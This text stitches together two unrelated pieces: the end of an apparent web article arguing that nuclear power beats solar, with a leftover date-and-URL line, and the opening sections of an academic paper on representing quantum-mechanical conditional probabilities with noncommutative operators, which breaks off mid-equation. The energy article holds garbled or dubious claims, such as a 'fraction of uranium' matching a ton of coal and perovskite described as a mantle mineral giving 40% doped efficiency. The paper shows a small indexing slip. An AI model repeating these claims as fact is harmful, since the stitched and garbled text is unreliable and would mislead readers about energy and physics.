Industrial estimates reveal that you need around five acres of land to produce 1 MW of solar energy. For a 1,000MW plant, you need 5,000 acres. As you have read already, the efficiency of photovoltaic panel is about 11-15% and the efficiency of a nuclear power plant is around 33%. With the current model, you will need a much larger solar plant to generate energy to match the energy generated by a 1,000MW nuclear power plant.
However, the efficiency of a panel is never 15%. It varies from time to time. It is dependent on many variable quantities such as temperature, weather, orientation, shade, and panel/roof pitch (inclination of roof/panel).
Fuel resources
A fraction of uranium produces about the same energy produced by one ton of coal. It should take hundreds of years for us to exhaust these resources. Nevertheless, this fuel is an exhaustible resource. Nuclear fusion kicks in and all these inconveniences are resolved.
This problem is absent in the case of a solar plant. Right from class five, we learnt that solar energy is a renewable energy resource (If you want to be too critical. Yes, solar energy is not renewable. Sun dies after 5 billion years).
Safety aspects and pollution
Avoid proper care and a nuclear power plant can lead to an environmental disaster. Chernobyl still haunts us, lack of proper care lead to that disaster in 1986. These kinds of disasters are rare but one can never let their guard down. The human factor is always present in nuclear power plants. Dispose of nuclear waste will always be problematic. Slow decay of hazardous by-products makes the matters worse.
Related: Where Does All The Nuclear Waste Go?
Solar plants cannot cause an ecological disaster. A win over a nuclear power plant but manufacturing of solar plants results in toxic wastes. We have generated more than 15 million tons of toxic waste between 2007 and 2011. Again, managing this waste is a problem.
To reduce total emissions, the only practical method is to shift to nuclear. Nearly 80% of power produced in France is through nuclear power plants.
Forthcoming step-ups
Forsaking the present-day and progressing to the imminent, we can expect:
A nuclear fission with thorium as fuel will be the answer to a much safer nuclear power plant. The waste generated is in lesser quantities and is more stable when associated with conventional nuclear waste.
Generation IV nuclear reactors should minimize waste. Apart from this, these are extremely economical.
We could also go for Sodium-Cooled Fast-Spectrum Reactor (Generation IV reactor). It provides better safety and enhanced efficiency. Waste management in unparalleled. Fuel recovery is up to 99.99%.
Never count out feasible nuclear fusion.
In Solar panels, expect two-sided ones. Two-sided panels generate up to 10% more electricity. Doping silicon with other semi-conductors increase the efficiency up to 40%. However, this is still in experimental phase only.
A mineral found in the Earth’s mantle – Perovskite has produced extraordinary efficiencies in the laboratories. Right now, it is 18% but expect a sharp rise in the future. One could place Perovskite over regular solar panels to increase efficiency. The problem with Perovskite is the water and temperature sensitivity.
Self-cooling solar panels are also in the works. Along with this, researchers are trying to convert old car batteries into such panels with improved efficiency.
Nuclear dominates right now and will continue to do so for the next 20 years. Solar could catch up with the help of Perovskite and other technologies but Generation IV nuclear reactors are the future. As demonstrated by France and Sweden, it is the best possible way to cut down emissions at a rapid pace.
Bottom-line: Nuclear clearly wins. | 2024-01-11T01:27:15.642919 | https://example.com/article/8425 |
---
abstract: |
The aim of this paper is to analyze the reconstructability of quantum mechanics from classical conditional probabilities representing measurement outcomes conditioned on measurement choices. We will investigate how the quantum mechanical representation of classical conditional probabilities is situated within the broader frame of noncommutative representations. To this goal, we adopt some parts of the quantum formalism and ask whether empirical data can constrain the rest of the representation to conform to quantum mechanics. We will show that as the set of empirical data grows conventional elements in the representation gradually shrink and the noncommutative representations narrow down to the unique quantum mechanical representation.
**Keywords:** noncommutativity, conditional probability, measurement-operator assignment
author:
- '*Gábor Hofer-Szabó*[^1]'
title: '**Quantum mechanics as a noncommutative representation of classical conditional probabilities**'
---
Introduction
============
In the quantum information theoretical paradigm one is usually looking for the reconstruction of quantum mechanics from information-theoretic first principles (Hardy, 2008; Chiribella, D’Ariano and Perinotti, 2017). This approach has produced many fascinating mathematical results and greatly contributed to a better understanding of the complex formal structure of quantum mechanics. As a top-down approach, however, its prime aim was to clarify the relation of the theory to higher-order (rationality, information-theoretic, etc.) principles and payed less attention to the “legs” of the theory connecting it to experience.
In this paper we take an opposite, bottom-up route and ask—in the spirit of the good old empiricist tradition—as to how the theory can be reconstructed not from first principles but from experience. More precisely, we will ask whether we can reconstruct the formalism of quantum mechanics from using simply classical conditional probabilities.
Why classical conditional probabilities?
Quantum mechanics as a probabilistic theory provides us quantum probabilities for certain observables. The question is how to connect these quantum probabilities to experience. The correct answer is that the probabilities provided by the Born rule should be interpreted as *classical conditional probabilities*. They are *classical* since they are nothing but the long-run relative frequency of certain measurement outcomes explicitly testable in the lab; and they are *conditional* on the fact that a certain measurement had been chosen and performed (E. Szabó, 2008). For example, the quantum probability of the outcome “spin-up” in direction $z$ is the relative frequency of the outcomes “up”—but not in the statistical ensemble of *all* measurement outcomes (which may also comprise spin measurements in *other* directions) but only in the *sub*ensemble when spin was measured in direction $z$.
What does it mean to reconstruct quantum mechanics from classical conditional probabilities?
First note that all we are empirically given are classical conditional probabilities. The question is how to represent these empirical data. As it was hypothesized in (E. Szabó 1995) and shown—under some specific conditions—in (Bana and Durt 1997), (E. Szabó 2001) and (Rédei 2010) classical conditional probabilities conforming to the probabilistic predictions of quantum mechanics need *not* necessarily be represented in the formalism of quantum mechanics. The so-called “Kolmogorovian Censorship Hypothesis” (or better, Proposition) states that there is always a Kolmogorovian representation of the quantum probabilities *if* the measurement conditions also make part of the representation. Thus, a stubborn classicist will always find a way to represent the empirical content of quantum mechanics in a purely classical framework.
On the other hand, quantum mechanics has proved to be an extremely elegant and economic representation of these empirical data. It provides a principled representation of an enormous collection of conditional probabilities together with their dynamical evolution.
Our paper is a kind of interpolation between the two sides. Our strategy will be to accept *some* parts of the quantum mechanical representation of classical conditional probabilities and ask whether the *rest* follows. More precisely, we accept the noncommutative probability theory (see Gudder 1988; Rédei and Summers, 2007) which in our case will boil down to representing observables and states by linear operators. We also adopt the Born rule connecting the quantum probabilities to real-world classical conditional probabilities; and the quantum mechanical representation of measurement settings and measurement outcomes. The only “free variable” will be the representation of the *state* of the system. Our main question will then be as to what empirical data ensure that the state of a system is represented by a density operator.
By this strategy we are going to analyze how quantum mechanics is situated within a noncommutative probability theory and to study whether the specific quantum mechanical representation of classical conditional probabilities within this broader frame can be traced back to purely empirical facts or is partly of conventional nature.
In the paper we will proceed as follows. In Section 2 we introduce the general scheme of a noncommutative representation of classical conditional probabilities. In the subsequent three sections we gradually enhance the set of empirical data that is the set of classical conditional probability of measurement outcomes. We ask whether by increasing the set of empirical data the noncommutative representation of these data necessarily narrows down to the quantum mechanical representation or some extra conventional elements are also needed. The empirical situation we are going to represent will be three yes-no measurements in Section 3, $k$ measurements each with $n$ outcomes in Section 4, and finally a continuum set of measurements with $n$ outcomes in Section 5. We will see how the conventional part gradually shrinks as experience grows until the representation finally zooms in on the quantum mechanical representation. We discuss our results in Section 6.
Quantum mechanical and noncommutative representation
====================================================
Suppose there is a physical system in state $s$ and we perform a set $\{a_i\}$ $(i\in I)$ of measurements on the system. Denote the outcomes of measurement $a_i$ by $\{A^j_i\}$ $(j\in J)$. Suppose that by repeating the measurements many times we obtain a probability $p_s(A^j_i|a_i)$ that is a stable long-run relative frequency for each outcome $A^j_i$ *given* measurement $a_i$ is performed. Now, quantum mechanics represents these conditional probabilities as it is summarized in the following table:
[ccc]{} Operator assignment: && Born rule:\
--------------------- ------------------- ----------------------------------------
System $\longrightarrow$ $\H$: Hilbert space
Measurements: $a_i$ $\longrightarrow$ $O_i$: self-adjoint operators
Outcomes: $A^j_i$ $\longrightarrow$ $P^j_i$: spectral projections of $O_i$
States: $s$ $\longrightarrow$ $W_s$: density operators
--------------------- ------------------- ----------------------------------------
: Quantum mechanical representation
&&
----------------------------------------
$p_s(A^j_i|a_i) = \mbox{Tr}(W_sP^j_i)$
----------------------------------------
: Quantum mechanical representation
\
In the table the different concepts are presented. On the left hand side of the arrow/equation sign stand the empirical concepts to be represented; on the right hand side stand the mathematical representation of the empirical concepts. The two are not to be mixed. Although we do not use “hat” to denote operators, throughout the paper we carefully distinguish empirical terms (measurements, outcomes, states) from their representation (self-adjoint operators, projections, density operators). Thus, the physical system under investigation is associated to a Hilbert space $\H$; each measurement $a_i$ is represented by a self-adjoint operator $O_i$; the outcomes $A^j_i$ of $a_i$ are represented by the orthogonal spectral projections of $O_i$; and the state $s$ of the system is represented by a density operator $W_s$, a self-adjoint, positive semidefinite operator with trace equal to 1. In the second column the mathematical representation is connected to experience by the Born rule: the representation is correct only if the quantum mechanical trace formula $\mbox{Tr}(W_sP^j_i)$ correctly yields the empirical conditional probability $p_s(A^j_i|a_i)$ for any outcome $A^j_i$ of measurement $a_i$ and any state $s$.
Note the following two facts. First, the trace formula is associated to a *conditional* probability, not to a probability *simpliciter*. This means, among others, that in joint measurements one always needs to combine different measurement conditions. Second, the trace formula is “holistic” in the sense that the empirically testable conditional probabilities are associated to the trace of the *product* of two operators, one representing the state and the other representing the measurement. This leaves us with a lot of freedom to account for the same empirical content in terms of operators.
The main question of our paper is whether the above quantum mechanical representation of classical conditional probabilities is constrained upon us if the set of empirical data is large enough or whether we need some extra theoretical, aesthetic etc. considerations to arrive at it. In order to decide on this question, we consider first a wider class of representations which we will call *noncommutative representations*. We will then ask whether a noncommutative representation of a set of large enough data is necessarily a quantum mechanical representation.
What is a noncommutative representation?
Generally, a noncommutative representation is simply an association of measurements and states to linear operators acting on a Hilbert space such that some functional of the representants provides the correct empirical conditional probabilities. Obviously this association can be done in many different ways. In our paper we pick a special noncommutative representation which is very close to the quantum mechanical representation: We retain all the assignments (denoted by $\longrightarrow$) of the above table except the last one. That is we will represent the system by a Hilbert space, the measurements by self-adjoint operators, and the outcomes by the orthogonal spectral projections. We also retain the Born rule connecting the formalism to experience. The only part of the representation which we let vary will be the association of the state of the system to linear operators. That is we do not demand that states should necessarily be represented by density operators. We summarize this scheme in the following table:
[ccc]{} Operator assignment: && Born rule:\
--------------------- ------------------- ----------------------------------------
System $\longrightarrow$ $\H$: Hilbert space
Measurements: $a_i$ $\longrightarrow$ $O_i$: self-adjoint operators
Outcomes: $A^j_i$ $\longrightarrow$ $P^j_i$: spectral projections of $O_i$
States: $s$ $\longrightarrow$ $W_s$: linear operators
--------------------- ------------------- ----------------------------------------
: Noncommutative representation
&&
----------------------------------------
$p_s(A^j_i|a_i) = \mbox{Tr}(W_sP^j_i)$
----------------------------------------
: Noncommutative representation
\
Obviously, our noncommutative representation is only one special choice among many. One could well take different routes. For example one could demand that the state should be represented by density operators but abandon that the projections representing the outcomes should be orthogonal. Or one could replace the Born rule by another expression connecting the formalism to the world. As said above, the connection of the formalism of quantum mechanics and experience is of holistic nature; one can fix one part of the formalism and see how the rest may vary such that the resulting probabilities are in tune with experience. With respect to our aim which is to see how we are compelled to adopt the quantum mechanical representation by increasing the number of conditional probabilities to be represented, our above choice is just as good as any other.
What we will test in the subsequent sections is whether our noncommutative representation is necessarily a quantum mechanical representation. In other words, we will test whether for any choice of operators representing a certain set of measurements and the outcomes such that the Born rule yields the correct conditional probabilities, the state will necessarily be represented by a density operator. In Section 3 we start off as a warm-up with three measurements; in Section 4 we continue with $k$ measurements; and in Section 5 we end up by uncountably many measurements. It will turn out that the gap between noncommutative and quantum mechanical representation gradually shrinks as the set of empirical data grows.
Case 1: Three yes-no measurements
=================================
Consider a box filled with balls. Denote the preparation of the box by $s$. Suppose you can perform three different measurements on the system; you can measure the *color*, the *size* or the *shape* of the balls. Denote the three measurements as follows:
[ ]{}
------ -------------------
$a$: Color measurement
$b$: Size measurement
$c$: Shape measurement
------ -------------------
[ ]{}Suppose that each measurement can have only two outcomes:
[ ]{}
-------- ------- -- -------- -------
$A^+$: Black $A^-$: White
$B^+$: Large $B^-$: Small
$C^+$: Round $C^-$: Oval
-------- ------- -- -------- -------
[ ]{}Suppose you pick a measurement, perform it many times (putting the balls always back into the box), and count the probability, that is the long-run relative frequency, of the outcomes. What you obtain is the *conditional* probability of the outcomes *given* the measurement you picked is performed on the system prepared in state $s$: $$\begin{aligned}
p^\pm_a &:=& p_s(A^\pm|a) \label{p(a)} \\
p^\pm_b &:=& p_s(B^\pm|b) \label{p(b)} \\
p^\pm_c &:=& p_s(C^\pm|c) \label{p(c)}\end{aligned}$$ Now, suppose you are going to represent the above empirical facts not in the standard classical probability theory but in a quantum fashion. Since our model contains only two-valued (yes-no) measurements, it suffices to use only a minor fragment of quantum mechanics. Again, we summarize it in a table:
[ccc]{} Operator assignment: && Born rule:\
---------------------- ------------------- -------------------------------------------------
System: $\longrightarrow$ $\CO_2$
Color: $a$ $\longrightarrow$ $O_a = {\bf a}\bm{\s}$
Size: $b$ $\longrightarrow$ $O_b = {\bf b}\bm{\s}$
Shape: $c$ $\longrightarrow$ $O_c = {\bf c}\bm{\s}$
Black/White: $A^\pm$ $\longrightarrow$ $P^\pm_a = \frac{1}{2}(\UN \pm {\bf a}\bm{\s})$
Large/Small: $B^\pm$ $\longrightarrow$ $P^\pm_b = \frac{1}{2}(\UN \pm {\bf b}\bm{\s})$
Round/Oval: $C^\pm$ $\longrightarrow$ $P^\pm_c = \frac{1}{2}(\UN \pm {\bf c}\bm{\s})$
State: $s$ $\longrightarrow$ $W_s = \frac{1}{2}(\UN + {\bf s}\bm{\s})$
---------------------- ------------------- -------------------------------------------------
: Quantum mechanical representation of three yes-no measurements in $\CO_2$
&&
-----------------------------------------------------------------
$p^\pm_a = \mbox{Tr}(W_sP^\pm_a) = \frac{1}{2}(1 \pm {\bf sa})$
$p^\pm_b = \mbox{Tr}(W_sP^\pm_b) = \frac{1}{2}(1 \pm {\bf sb})$
$p^\pm_c = \mbox{Tr}(W_sP^\pm_c) = \frac{1}{2}(1 \pm {\bf sc})$
-----------------------------------------------------------------
: Quantum mechanical representation of three yes-no measurements in $\CO_2$
\
Here, the Hilbert space associated to the system is the two-dimensional complex space $\CO_2$; and the operators associated to the measurements, outcomes and the state are all self-adjoint operators acting on $\CO_2$. According to this representation, called the Bloch sphere representation, a self-adjoint operator $O_a$ associated to measurement $a$ can be represented by the inner product of a unit vector ${\bf a}= (a_x,a_y,a_z)$ in $\RE^3$ and the Pauli vector $\bm{\s}= (\s_x,\s_y, \s_z)$. The two outcomes $A^\pm$ of measurement $a$ are associated to the spectral projections $P^\pm_a = \frac{1}{2}(\UN \pm {\bf a}\bm{\s})$ of $O_a$, where $\UN$ is the two-dimensional identity operator. Finally, the density operator $W_s$ associated to the state $s$ of the system is of the form $W = \frac{1}{2}(\UN + {\bf s}\bm{\s})$, where ${\bf s}= (s_x,s_y,s_z)$ is in the unit ball $B=\{{\bf r} \in \RE^3: |{\bf r}| \leqslant 1\}$ of $\RE^3$. If $|{\bf s}| = 1$, then $s$ is said to be a pure state, otherwise a mixed state. Again, the empirical content of the representation is ensured by the Born rule which in this two-dimensional case boils down to the inner product: $p^\pm_a = \frac{1}{2}(1 \pm {\bf sa})$. (Similarly for $b$ and $c$.)
Now, to give a quantum mechanical representation for the above situation we need to associate the three measurements to three Bloch vectors and the state of the system to a fourth Bloch vectors (either unit or smaller) such that the Born rule (the trace formula) yields the pre-given conditional probabilities (\[p(a)\])-(\[p(c)\]). Thus, assign to each measurement a unit vector in $\RE^3$: $$\begin{aligned}
\{a,b,c\} \mapsto \{{\bf a}, {\bf b}, {\bf c}\} \label{assign}\end{aligned}$$ Suppose that the vectors ${\bf a}$, ${\bf b}$ and ${\bf c}$ are linearly independent. First, we show that given three pairs of empirical conditional probabilities $p^\pm_a$, $p^\pm_b$ and $p^\pm_c$ and also the assignment (\[assign\]), the operator $W_s$ associated to the state $s$ gets uniquely fixed. Schematically, $$\begin{aligned}
p^\pm_a, \, p^\pm_b, \, p^\pm_c \quad \& \quad {\bf a}, \, {\bf b}, \, {\bf c} \quad \Longrightarrow \quad W_s\end{aligned}$$ To see this, observe that any linear operator acting on $\CO_2$ can be written as $$\begin{aligned}
W_s= s_0 \UN + {\bf s}\bm{\s} +i(s'_0 \UN + {\bf s'}\bm{\s})\end{aligned}$$ where $s_0, s'_0 \in \RE$ and ${\bf s}, {\bf s'} \in \RE^3$. Now, applying the Born rule to the three measurements we get: $$\begin{aligned}
&&p^\pm_a = \mbox{Tr}(W_sP^\pm_a) = s_0 \pm {\bf sa} + i(s'_0 \pm {\bf s'a}) \\
&&p^\pm_b = \mbox{Tr}(W_sP^\pm_b) = s_0 \pm {\bf sb} + i(s'_0 \pm {\bf s'b}) \\
&&p^\pm_c = \mbox{Tr}(W_sP^\pm_c) = s_0 \pm {\bf sc} + i(s'_0 \pm {\bf s'c}) \end{aligned}$$ which, assuming that $p^\pm_a$, $p^\pm_b$ and $p^\pm_c$ are real and ${\bf a}$, ${\bf b}$ and ${\bf c}$ are linearly independent, yield $$\begin{aligned}
s_0 = \frac{1}{2} \quad \quad s'_0 = 0 \quad \quad {\bf s}'={\bf 0} \end{aligned}$$ and hence $$\begin{aligned}
&&p^\pm_a = \frac{1}{2} \pm {\bf sa} \\
&&p^\pm_b = \frac{1}{2} \pm {\bf sb} \\
&&p^\pm_c = \frac{1}{2} \pm {\bf sc} \end{aligned}$$ the solution of which is $W_s = \frac{1}{2}(\UN + {\bf s}\bm{\s})$ with $$\begin{aligned}
\label{sol}
{\bf s} = \frac{(p^+_a -\frac{1}{2})({\bf b \times c}) + (p^+_b -\frac{1}{2})({\bf c \times a}) + (p^+_c -\frac{1}{2})({\bf a \times b})}{{\bf a}\cdot ({\bf b \times c})}\end{aligned}$$ where $\times$ is the cross product. (The linear independence of ${\bf a}$, ${\bf b}$ and ${\bf c}$ is needed for the triple product in the denominator not to be zero.)
[ ]{}This is a well-known result. Since the late 60s and early 70s there has begun an intensive research for the *empirical* determination of the state of a quantum system. In a series of papers Band and Park (1970, 1971) have extensively investigated how the expectation value of certain observables determine the state of a system. They investigated the minimal number of observables, called the *quorum*, needed for such state determinations; the structure and geometry of this set; and many other important features. The study of the *quorum* has become an eminent research project also in the new quantum informational paradigm. Quantum tomography, quantum state reconstruction, quantum state estimation etc. all follow the same path: they start from a set of observables and aim to end up with a more-or-less fixed state using empirical input (see for example (D’Ariano, Maccone and Paris, 2001)).
However, all these endeavors have a common pre-assumption, namely that *the association of measurements to operators is already settled*. They all start from a set of operators and (by means of a set of empirical probabilities) aim to reconstruct the quantum state of a system. But an operator is not a measurement but only a representation of a measurement. Calling operators *observables* overshadows the fact that the operators are already on the mathematical side of the project and without providing an association of measurements to operators the state determination cannot rightly be called “empirical”. This measurement-operator assignment is that which we are going to make explicit in what comes.
[ ]{}Consider the following measurement-operator assignment in the context of our above model: we associate the following three Bloch vectors to the measurements $a$, $b$ and $c$: $$\begin{aligned}
{\bf a} &=& {\bf x} = (1,0,0) \label{a}\\
{\bf b} &=& (0,\cos \varphi, -\sin \varphi) \\
{\bf c} &=& {\bf z} = (0,0,1) \label{c}\end{aligned}$$ and for the sake of simplicity we set the conditional probabilities as follow: $$\begin{aligned}
p^+_a=p^+_b=p^+_c=:p \label{p}\end{aligned}$$ The Bloch vector ${\bf s}$ for these special directions and empirical probabilities will then be the following: $$\begin{aligned}
\label{r}
{\bf s}=(p-\frac{1}{2})\left(1, \, \frac{1 + \cos \varphi + \sin \varphi}{1 + \cos \varphi - \sin \varphi}, \, 1 \right)\end{aligned}$$ But the operator $W_s$ associated to the Bloch vector ${\bf s}$ will not necessarily be a density operator. For example for any $$\begin{aligned}
p \in [0.76,1] \quad \mbox{and} \quad \varphi \in [\pi/3, \pi/2) \label{nodens}\end{aligned}$$ the vector ${\bf s}$ will be longer than 1 and hence $W_s$ will not be positive semidefinite, that is, a density operator.
Thus, we have provided a noncommutative but not quantum mechanical representation of the above scenario. All the assignments of the table at the beginning of this section hold except the last one: the state of the system is represented by a linear operator but not a density operator.
This toy-example is, however, special in two senses: (i) the number of measurements is finite and (ii) the number of outcomes is two, that is, the scenario is represented in the two-dimensional Hilbert space which is always a special case. We tackle point (ii) in the next section and point (i) in the one after the next.
Case 2: $k$ measurements with $n$ outcomes
==========================================
Let us then see whether a larger set of probabilities can also be given a noncommutative but not quantum mechanical representation. Suppose we perform $k$ measurements on a system such that each measurement can have $n$ outcomes. Suppose we obtain the following empirical conditional probabilities: $$\begin{aligned}
p^j_i := p(A^j_i | a_i)\geqslant 0 \quad \mbox{with} \quad \sum_i p^j_i =1 \quad \mbox{for all} \quad i=1 \dots k; \, j=1 \dots n\end{aligned}$$ Just as above we represent each measurement $a_i$ by a self-adjoint operator $O_i$ in the Hilbert space $\H_n$ and the measurement outcomes $\{A^j_i\}$ of $a_i$ by the orthogonal spectral projections $\{P^j_i\}$. The representation is connected to experience by the Born rule: $$\begin{aligned}
p^j_i := p(A^j_i | a_i) = \mbox{Tr}(W_sP^j_i)\end{aligned}$$ where $W_s$ is a linear operator representing the state $s$ of the system. Again, we do not assume that $W_s$ is a density operator; our task is just to see whether it follows that $W_s$ is always a density operator.
Now, the empirically given probability distributions together with the conventionally chosen sets of minimal orthogonal projections provide constraints on $W_s$ via the Born rule. For a certain number of measurements $W_s$ gets completely fixed. Schematically, $$\begin{aligned}
\{p^j_1\}, \, \{p^j_2\} \, \dots \, \{p^j_k\} \quad \& \quad \{P^j_1\}, \, \{P^j_2\} \, \dots \, \{P^j_k\} \quad \Longrightarrow \quad W_s\end{aligned}$$
How many measurements are needed to uniquely fix $W_s$?
$W_s$ gets uniquely fixed if Tr$(W_s A)$ is given for $n^2$ linearly independent operators $A$. Our operators are minimal projections. The first set of minimal orthogonal projections provides $n$ linearly independent equations. Any further linearly independent set of orthogonal projection provides $n-1$ extra equations since in each set the projections sum up to the unity. That is $k$ linearly independent sets of minimal orthogonal projections provide $k(n-1) +1 $ linearly independent equations which is equal to $n^2$ if $k=n+1$. Thus, performing $k=n+1$ measurements on our system (resulting in $k=n+1$ probability distributions) and representing all the outcomes by orthogonal projections in $\H_n$, the linear operator $W_s$ gets uniquely fixed.
But it will not necessarily be a density operator!
Our question is then: Do $k=n+1$ measurements constrain $W_s$ to be a density operator for *all* linearly independent sets of orthogonal projections representing the outcomes and *all* probability distributions generated from the projections by the Born rule? Again, what we test here is whether a noncommutative representation is necessarily a quantum mechanical representation.
Now, we show that the answer is: *no*.
As said above, a density operator is a self-adjoint, positive semidefinite operator with trace equal to 1. Self-adjoint operators in $\H_n$ form a vector space $V$ over the field of real numbers. This vector space can also be endowed with an inner product induced by the trace: $(A,B) := \mbox{Tr}(AB)$. The operators with trace equal to 1 form an affin subspace $E$ in $V$ and the positive semidefinite operators form a convex cone $C_+$. (A subset $C$ of a real vector space $V$ that linearly spans $V$ is a *convex cone* if for any $A_1,A_2 \in C$ and $r_1,r_2 \in \RE_+$, $r_1A_1 +r_2A_2 \in C$ and $A, -A\in C\Rightarrow A=0$). The intersection of the two, $\C_+ \cap E$, is a convex set in the affin subspace. The extremal elements of this set are the minimal projections in $\H_n$. Denote this set of minimal projections in $\H_n$ by $\P_n$.
Now, for any cone $C$ in $V$, the *dual cone* $C^*$ is defined as $$\begin{aligned}
C^* := \{ A \in V \, | \, \mbox{Tr}(A B) \geqslant 0 \quad \mbox{for all} \, \, B \in C\} \end{aligned}$$ According to Fejér’s Trace Theorem the cone of the positive semidefinite operators is self-dual that is $C^*_+= C_+$.
Now, let us return to our example. Consider the $k=n+1$ linearly independent sets of orthogonal projections representing the measurement outcomes in $\H_n$. Let $D$ be the convex cone expanded by these projections in $\P_n$ as extremal elements. Obviously, $D \subset C_+$ and consequently $D^* \supset C^*_+ =C_+$. Pick an element from $(D^* \setminus C_+) \cap E$ and call it $W_s$. Lying outside $C_+$, $W_s$ will *not* be positive semidefinite but, lying in $E$, $W_s$ will be of trace 1. Hence for any set of orthogonal projections it generates a probability distribution by the Born rule.
Thus, we have found a counter-example (actually, continuously many counter-examples): $k=n+1$ linearly independent sets of orthogonal projections representing measurement outcomes and $k=n+1$ probability distributions such that the latter is generated from the former by the Born rule with an operator $W_s$ which is *not* a density operator (since is not positive semidefinite). Hence, we have provided a noncommutative but not quantum mechanical representation for a situation in which $k=n+1$ measurements with $n$ outcomes are performed on a system. This shows that our previous result is not a consequence of the fact that the Hilbert space is the special $\H_2$. Conditional probabilities of finitely many measurements with finitely many outcomes can always be given a noncommutative but *not* quantum mechanical representation.
But what is the situation if we are going to the continuum limit? Does our counter-example survive if the cardinality of the set of conditional probabilities to be represented is uncountable? To this we turn in the next section.
Case 3: A continuum set of measurements with $n$ outcomes
=========================================================
There is a theorem which immediately comes to one’s mind when going to the continuum limit, namely Gleason’s theorem.
Suppose we are given a continuum set of probability distributions of measurements with, say, $n$ outcomes. We are to represent this set in an $n$-dimensional Hilbert space $\H_n$. Now, suppose that we assign self-adjoint operators to the measurements such that the spectral projections of the various operators together cover the *full* set $\P_n$ of minimal projections in $\H_n$. In other words, there is no minimal projection in $\P_n$ which does not represent a measurement outcome. In this case we can invoke Gleason’s theorem to decide on the question as to whether there exist noncommutative representations which are not the quantum mechanical representation. Gleason’s theorem answers this question in the negative.
Gleason’s theorem namely claims that for every state $\phi$ in a Hilbert space with dimension greater than 2 there is a density operator $W$ (and vica versa) such that the Born rule $\phi(P) = \mbox{Tr}(PW)$ holds for *all* projections. In other words, if *all* projections are considered, then the state will uniquely be represented by a density operator. Translating it into our case, the theorem claims that *if* one represents the continuum set of measurement outcomes by the *full* set $\P_n$ of projections of a given Hilbert space, then one has no other choice to account for the whole set of conditional probabilities, than to represent the state by a density operator.
Note, however, that the previous sentence is a conditional: *if* we represent the measurement outcomes by the full set $\P_n$, *then* Gleason’s theorem tells us that the only representation is the quantum mechanical. This raises the following question: Are we compelled to represent a continuum set of measurement outcomes necessarily by the full set of minimal projections? Can we not “compress” somehow the set of projections representing the measurement outcomes such that (i) the outcome-projection assignment is injective (no two outcomes of different measurements are represented by the same projection), still (ii) the set of projections is only a proper subset of $\P_n$? As we saw in the previous section, in this case we can always represent the state of the system by a linear operator which is not a density operator. Or to put it briefly, can we avoid Gleason’s theorem by not making use of all minimal projections of $\P_n$?
As stressed in Section 2, it is of crucial importance to discern physical measurements from operators mathematically representing them. When we use Gleason’s theorem we intuitively assume that *all* projections in a Hilbert space represent a measurement outcome for a real-world physical measurement. The case of spin enforces this intuition since the Bloch sphere representation of spin-half particles nicely pairs the spatial orientations of the Stern-Gerlach apparatus with the projections of $\P_2$. In general, however, we have no *a priori* knowledge of the measurement-operator assignment. Particularly, we cannot assume that a set of measurements *just because it is an uncountable set* has to be represented by the *full* set of projections of a given Hilbert space. *A priori* it is perfectly conceivable that a set of real-world measurements, even if its cardinality is uncountable, can be represented by a proper subset of $\P_n$.
But now suppose that for a given Hilbert space $\H_n$ *all* the self-adjoint operators on $\H_n$ represent a real-world empirical measurement with $n$ outcomes and *all* states on $\H_n$ represent a real-world preparation of the system to be measured. In other words, take it at face value that the full formalism of an $n$-dimensional quantum mechanics has an empirical meaning. We coin the term *full empirical content of the $n$-dimensional quantum mechanics* for the full (continuum) set of conditional probabilities of measurement outcomes provided by the Born rule, that is by the trace of the product of the different spectral projections and density operators in $\H_n$. Now, our question is this: can the full empirical content of the $n$-dimensional quantum mechanics be represented in $\H_n$ in a noncommutative but *not* quantum mechanical way?
The previous three paragraphs amounts to two different questions, one concerning cardinality the other concerning full empirical content:
1. Is a noncommutative representation of a set of empirical probabilities necessarily a quantum mechanical representation if the cardinality of the set is continuum?
2. Is a noncommutative representation of the full empirical content of the $n$-dimensional quantum mechanics necessarily a quantum mechanical representation?
In what comes we will show that the answer to the first question is *no* and the answer to the second question is *yes*.
[ ]{}We start with the first question. Our task is to represent a continuum set of empirical probabilities in a noncommutative but not quantum mechanical way. The set we pick will be the set of probabilities of spin measurements in all the different spatial directions performed on an electron prepared in *one* given state. This set is obviously a continuum set but not yet the full empirical content of the two-dimensional quantum mechanics since we consider only one state. The continuum set of empirical conditional probabilities is the following: $$\begin{aligned}
\big\{p^\pm_a := p_s(A^\pm|a); \quad s \, \, \mbox{is fixed}\big\} \label{condprob}\end{aligned}$$ Here $a$ denotes the spin measurement in direction ${\bf a}$ and $A^\pm$ are the two spin outcomes. Now, in the Bloch sphere representation one associates two unit vectors $$\begin{aligned}
{\bf a} &=& (1, \vartheta, \varphi) \\
{\bf s} &=& (1, 0, 0) \end{aligned}$$ to the spin measurement $a$ and state $s$ of the system, respectively, such that the Born rule yields the conditional probabilities (\[condprob\]):
[ccc]{} Operator assignment: && Born rule:\
------------------- ------------------- ---------------------------------------------------------------------------------------------
Outcomes: $A^\pm$ $\longrightarrow$ $P^\pm_a = \frac{1}{2}(\UN \pm {\bf a}\bm{\s})$ $\quad {\bf a} \in \RE^3, \, |{\bf a}| = 1$
Pure state: $s$ $\longrightarrow$ $W_s = \frac{1}{2}(\UN + {\bf s}\bm{\s})$ $\quad {\bf s} \in \RE^3, \, |{\bf s}| = 1$
------------------- ------------------- ---------------------------------------------------------------------------------------------
: Quantum mechanical representation of the empirical conditional probabilities (\[condprob\])
&&
------------------------------------
$p^\pm_a = \mbox{Tr}(W_sP^\pm_a) $
------------------------------------
: Quantum mechanical representation of the empirical conditional probabilities (\[condprob\])
\
As is well-known, the measurement outcomes in the Bloch sphere representation are associated to the *full* set of minimal projections $\P_2$, and hence $W_s$ must be represented by a density operator due to Gleason’s theorem. However, the Bloch sphere representation is not the only possible noncommutative representation of (\[condprob\]). Here is an alternative.
Consider the following two functions: $$\begin{aligned}
&&f: S^2 \to S^2; \, {\bf a} \mapsto f({\bf a}) \\
&&g: S^2 \to \RE^3; \, {\bf s} \mapsto g({\bf s})\end{aligned}$$ and suppose that instead of $\bf a$ and $\bf s$ we associate $$\begin{aligned}
f({\bf a}) &=& (1, \vartheta', \varphi') \\
g({\bf s}) &=& (r, 0, 0)\end{aligned}$$ to $a$ and $s$, respectively, where $$\begin{aligned}
\vartheta' &=& \arccos \left(\frac{\cos(\vartheta)}{r} \right) \quad \mbox{for} \, \, \varphi \in [0,2\pi] \label{theta}\\
